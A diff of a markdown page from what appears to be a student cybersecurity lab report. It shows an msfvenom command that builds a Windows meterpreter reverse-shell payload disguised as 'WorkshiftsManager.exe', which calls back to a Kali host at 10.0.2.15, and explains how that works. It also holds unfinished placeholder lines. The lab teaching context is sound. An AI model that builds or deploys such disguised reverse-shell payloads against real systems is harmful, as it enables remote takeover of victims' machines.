AM311/Cybersecurity_Report/home.md

     `msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp  LHOST=10.0.2.15 -b "\x00" -f exe -o ./Desktop/WorkshiftsManager.exe`

 	 `msfvenom` is a pre-installed payload generator and encoder available on Kali, through which we build a `.exe` file executable on all Windows devices.
-This payload will spawn a reverse shell client, which will connect to the reverse shell server that, in this case, will be list
+This payload will spawn a reverse shell client, which will connect to the reverse shell server listening on the Kali machine (`10.0.2.15`).

+	The output of the command execution is an .exe file that we will find

  7. dd
  8. gg